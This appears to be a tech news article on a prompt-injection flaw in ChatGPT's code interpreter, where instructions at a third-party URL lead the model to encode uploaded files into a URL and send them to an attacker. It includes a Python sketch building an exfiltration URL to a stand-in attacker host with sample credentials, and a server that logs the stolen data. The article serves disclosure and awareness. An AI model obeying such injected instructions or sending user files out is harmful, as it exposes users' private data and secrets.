The Latest ChatGPT Update Raises Questions About Data Safety

Recent ChatGPT Plus updates, including file uploads and the Code Interpreter, raise security concerns highlighted by research from Johann Rehberger and Tom’s Hardware.


The latest ChatGPT Plus update introduces new features, including DALL-E image generation and the code interpreter for Python execution and file analysis. However, the sandboxed environment that runs the code interpreter is vulnerable to prompt injection attacks, putting uploaded data at risk.


ChatGPT has been susceptible to this kind of vulnerability for a while now. The attack works by deceiving ChatGPT into following instructions hosted at a third-party URL, which prompt the model to encode the contents of uploaded files into a URL-friendly string and transmit that data to a malicious website. Although pulling off such an attack depends on specific conditions (such as the user actively pasting a malicious URL into ChatGPT), the potential risk is unsettling.
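To make the mechanism concrete, here is a minimal sketch of the encoding step described above, written in Python (the same language the code interpreter runs). The endpoint name and parameter are assumptions for illustration only; real injection pages word their instructions differently, and the point is simply that file contents can be smuggled out inside a single URL.

```python
import base64
import urllib.parse

# Hypothetical attacker endpoint -- the name is an assumption for illustration.
EXFIL_ENDPOINT = "https://attacker.example/collect"

def encode_for_url(file_bytes: bytes) -> str:
    """Encode raw file contents into a URL-safe string (base64, then percent-encoded)."""
    b64 = base64.urlsafe_b64encode(file_bytes).decode("ascii")
    return urllib.parse.quote(b64)

# Example: the contents of an uploaded file end up embedded in one GET request URL.
uploaded = b"API_KEY=sk-demo-1234\nDB_PASSWORD=hunter2\n"
exfil_url = f"{EXFIL_ENDPOINT}?d={encode_for_url(uploaded)}"
print(exfil_url)
```

A single request to a URL like this is all it takes for the data to leave the sandbox, which is why the injected instructions focus on getting the model to build and visit such a link.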

Threat Scenarios and Hands-On Testing

This threat could play out in several ways: a trusted website could be compromised and seeded with a malicious prompt, or an attacker could deliver the link through social engineering.

Tom’s Hardware tested how vulnerable users are to this attack. They created a simulated environment-variables file and used ChatGPT to process it, whereupon the model unwittingly sent the data to an external server. The exploit’s effectiveness varied between sessions (ChatGPT sometimes refused to load the external page or to transmit the file data), but the results still point to a substantial security concern, especially given that the code interpreter can read user-uploaded files and execute Linux commands inside its Linux-based virtual environment.
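For readers curious what verifying such a test looks like, below is a minimal sketch, not Tom’s Hardware’s actual harness, of a receiving server a tester could run to confirm whether file contents actually arrive. The parameter name "d", the port, and the local address are assumptions for illustration, and any "environment variables" file used in a test like this should contain only dummy values.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
import base64

class ExfilLogger(BaseHTTPRequestHandler):
    """Logs any query parameter named 'd', decoding it if it looks like base64."""

    def do_GET(self):
        params = parse_qs(urlparse(self.path).query)
        for value in params.get("d", []):
            try:
                # Restore padding before decoding the URL-safe base64 payload.
                decoded = base64.urlsafe_b64decode(value + "=" * (-len(value) % 4))
                print("Received exfiltrated data:\n", decoded.decode("utf-8", "replace"))
            except Exception:
                print("Received undecodable payload:", value)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

if __name__ == "__main__":
    # Listening locally here; in the reported tests the receiving server was external.
    HTTPServer(("127.0.0.1", 8000), ExfilLogger).serve_forever()
```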

Tom’s Hardware stresses that this loophole matters because ChatGPT is not supposed to follow instructions embedded in external web pages at all. OpenAI has not yet responded to Mashable’s request for comment on the matter.
